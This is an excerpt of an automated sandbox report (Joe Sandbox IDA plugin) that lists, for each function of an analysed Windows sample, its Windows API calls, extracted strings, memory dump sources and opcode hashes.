                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: ebdd085c650bb2f7fe8a7f9eb5be111b6dbf7754b59d1692e82e1c2aede5edc4
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: ebdd085c650bb2f7fe8a7f9eb5be111b6dbf7754b59d1692e82e1c2aede5edc4
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 77ab612ee225df55d17424f824850ade9a255c2a226901f95eed2553aba11274
                                                • Instruction ID: b7cd2c1549d9854d69cd8d73b8333d94282419f835f42255d36dd836dd1ec64e
                                                • Opcode Fuzzy Hash: 77ab612ee225df55d17424f824850ade9a255c2a226901f95eed2553aba11274
                                                • Instruction Fuzzy Hash: C4A0029569D5227C310861557F46C37019DD4D5B517314699F409C54516B8119595031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 2b6f303f5aa0b8f8d92d840775c0abe40235316bd26bc8ec1f65ab9e0092af58
                                                • Instruction ID: 6bbb0ef0d7318fd1d5dbd8c32ad44e84a9b4053584bae0c9be24a507ae238437
                                                • Opcode Fuzzy Hash: 2b6f303f5aa0b8f8d92d840775c0abe40235316bd26bc8ec1f65ab9e0092af58
                                                • Instruction Fuzzy Hash: 8BA0019A6AE522BD3108A255BF4AC3B029DD4D2B21731869AF409D6892AB81199A6071
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a5441720db0c5922d565c0df9c47ea4951598cc66a55ce6090876e74a0538782
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: a5441720db0c5922d565c0df9c47ea4951598cc66a55ce6090876e74a0538782
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 3782e1fc10d151cf159a0e5de576972e9a2682b70f5168d92cc604b633c1b879
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: 3782e1fc10d151cf159a0e5de576972e9a2682b70f5168d92cc604b633c1b879
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 659697d54784a94339797f40a4f2d2c26e3977ea83f8b8d3ce0d874ecccb3825
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: 659697d54784a94339797f40a4f2d2c26e3977ea83f8b8d3ce0d874ecccb3825
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • SetDlgItemTextW.USER32(?,?,?), ref: 00B01DFC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ItemText
                                                • String ID:
                                                • API String ID: 3367045223-0
                                                • Opcode ID: 2f8107bac597b860054f43cb7408ae406f7ff1fc420c282af27345f519dc330b
                                                • Instruction ID: 8557a9a61b8acd134cf1c772f0d7636b35dc1fd2a0bcaf5d8ee32285dcb8ef9c
                                                • Opcode Fuzzy Hash: 2f8107bac597b860054f43cb7408ae406f7ff1fc420c282af27345f519dc330b
                                                • Instruction Fuzzy Hash: 0FC0EA31508200EFCB058B68E948E1ABBA6BB95312B5189A8F15486020C771D920DB62
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: ace680e3ddc143e6a0d1afc3e9ec931e8bb518afc6fcd722c834a33159e32d89
                                                • Instruction ID: b7cd2c1549d9854d69cd8d73b8333d94282419f835f42255d36dd836dd1ec64e
                                                • Opcode Fuzzy Hash: ace680e3ddc143e6a0d1afc3e9ec931e8bb518afc6fcd722c834a33159e32d89
                                                • Instruction Fuzzy Hash: C4A0029569D5227C310861557F46C37019DD4D5B517314699F409C54516B8119595031
                                                APIs
                                                • SetEndOfFile.KERNELBASE(?,00B0D115,?,?,?,?,?,?,?), ref: 00B0E8DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File
                                                • String ID:
                                                • API String ID: 749574446-0
                                                • Opcode ID: de1a95f08c06e31d6db2acf19d382f3a9b2a34748c12ee89c2fa2cc9ba9495f7
                                                • Instruction ID: f10931b2f58818aa1ec80118a29789b538f41d62e5b633ad20cd239700c4c46f
                                                • Opcode Fuzzy Hash: de1a95f08c06e31d6db2acf19d382f3a9b2a34748c12ee89c2fa2cc9ba9495f7
                                                • Instruction Fuzzy Hash: E8A00130205145CB9A451B61DE0960E7A6AAE41699B2980A8A4099A071DB268CA2AA41
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00000001,00B0DE10,5EA84158,?,00000000,00B393B1,000000FF,?,00B0BEA6,?), ref: 00B0DE6B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: a148cff6fc183e2002b87489dd0fa5f246c4d79ac350510e39ea8898e91dd9c2
                                                • Instruction ID: 7425445c770a7f64da60c9033f14621ac80ba57bb0484863173aed90f820a43e
                                                • Opcode Fuzzy Hash: a148cff6fc183e2002b87489dd0fa5f246c4d79ac350510e39ea8898e91dd9c2
                                                • Instruction Fuzzy Hash: 0AF0A071442B41DBEB349B74C804392BBE4AB21324F048B9ED0F64A5E4C7B0A9899B50
                                                APIs
                                                • _wcslen.LIBCMT ref: 00B09CB1
                                                  • Part of subcall function 00B0AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B0AC2E
                                                  • Part of subcall function 00B0AC11: GetLastError.KERNEL32 ref: 00B0AC72
                                                  • Part of subcall function 00B0AC11: CloseHandle.KERNEL32(?), ref: 00B0AC81
                                                  • Part of subcall function 00B02F45: _wcslen.LIBCMT ref: 00B02F50
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00B09EE1
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B09F1E
                                                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00B0A0BF
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00B0A127
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A134
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A14A
                                                • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A18E
                                                • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A196
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                • API String ID: 3517300771-3508440684
                                                • Opcode ID: 65f1368c5b425d68db38f779faa1062ced6ee78135364d4afdec11b43aa93da2
                                                • Instruction ID: affbd9f220ee99d00532cf2bcaf382a29a65c9c042fcd898a393bfc1dbe9000a
                                                • Opcode Fuzzy Hash: 65f1368c5b425d68db38f779faa1062ced6ee78135364d4afdec11b43aa93da2
                                                • Instruction Fuzzy Hash: 883264719002889FDB24DFA4CC85BEE7BF9EF15310F1045A9E859E72D2DB349A48CB61
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B2163A
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B216BB
                                                • EndDialog.USER32(?,00000006), ref: 00B216CE
                                                • GetDlgItem.USER32(?,0000006C), ref: 00B216EA
                                                • SetFocus.USER32(00000000), ref: 00B216F1
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B01DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00B01DFC
                                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B21763
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00B21783
                                                • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00B21826
                                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B218AD
                                                  • Part of subcall function 00B01150: _wcslen.LIBCMT ref: 00B0115B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                • String ID: %s %s$REPLACEFILEDLG
                                                • API String ID: 485132379-439456425
                                                • Opcode ID: b1e83d52a0484c894e0ce3830f4ce9ea67474d5fb5f45732381d6965060a1e53
                                                • Instruction ID: f8b39c06dbf66cbdabf32736dc9d675bca7d5437f6f7957fe5a0311317647ae6
                                                • Opcode Fuzzy Hash: b1e83d52a0484c894e0ce3830f4ce9ea67474d5fb5f45732381d6965060a1e53
                                                • Instruction Fuzzy Hash: 26A1C171A40228AADB25EBA8DC4AFEE7BFDAF15301F0045D5B209B30D1DA705F84CB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 260a48766f1282d404ee942b6efc41935ea825a5ca079fab688e341ffd483229
                                                • Instruction ID: 473ac6eefa6dad875105580d560eb6ff09db3338069b92b7dc7379ce93993dc3
                                                • Opcode Fuzzy Hash: 260a48766f1282d404ee942b6efc41935ea825a5ca079fab688e341ffd483229
                                                • Instruction Fuzzy Hash: 8BC20571E096288FDB35CE289D807EAB7F5EB44305F2545EAD84EE7240E774AE858F40
                                                APIs
                                                • _strlen.LIBCMT ref: 00B0438C
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B04523
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                • String ID: CMT
                                                • API String ID: 2172594012-2756464174
                                                • Opcode ID: 4076f1e691c21044e272afc19b5da5774071b9ffd09ea8d3788a59b6402793d3
                                                • Instruction ID: dcab4d02a7b88dddf4bafdbb44add457c1a86512546a48557619a9625cad6325
                                                • Opcode Fuzzy Hash: 4076f1e691c21044e272afc19b5da5774071b9ffd09ea8d3788a59b6402793d3
                                                • Instruction Fuzzy Hash: 8772BEB1A003448FCB18DF68C8957EA7FE5FF59300F0845ADED5A9B282DB70A945CB61
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B26884
                                                • IsDebuggerPresent.KERNEL32 ref: 00B26950
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B26970
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00B2697A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: f30fd2954cfd93f9d6a6fce12a4e16a532bb1a60c9b4880b84bf6e5ff400c6af
                                                • Instruction ID: 5f6753de2b8649e447022bf7eeeaba6642a7fc5d175b6a202f5e5f8c75203945
                                                • Opcode Fuzzy Hash: f30fd2954cfd93f9d6a6fce12a4e16a532bb1a60c9b4880b84bf6e5ff400c6af
                                                • Instruction Fuzzy Hash: 7F312775D453289BDB21DFA4D989BCCBBF8BF08300F1040EAE40CAB250EB759A849F45
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00B0952D,?,00000040,00B0931E,00000001,?,?,?,?,0000001C,00B17618,00B4E0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00B09330
                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00B0952D,?,00000040,00B0931E,00000001,?,?), ref: 00B09351
                                                • _wcslen.LIBCMT ref: 00B09360
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00B4E0C8,?,?,00B0952D,?,00000040,00B0931E,00000001,?,?,?,?,0000001C), ref: 00B09373
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                • String ID:
                                                • API String ID: 991192900-0
                                                • Opcode ID: 6cc7848897697a4fdc168950013761766ab48c23c6bc9047511d91e08cf7e4aa
                                                • Instruction ID: e6dee70f4da289e17ad18f1f2681459d67f5074d310d9bd9ea00410915bad2c3
                                                • Opcode Fuzzy Hash: 6cc7848897697a4fdc168950013761766ab48c23c6bc9047511d91e08cf7e4aa
                                                • Instruction Fuzzy Hash: 4AF082B5600214FBEB189BA19E05EFF7BBCEB85740B208099F502A71D1CE709E019B78
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00B2535E), ref: 00B2ABBC
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00B2535E), ref: 00B2ABC6
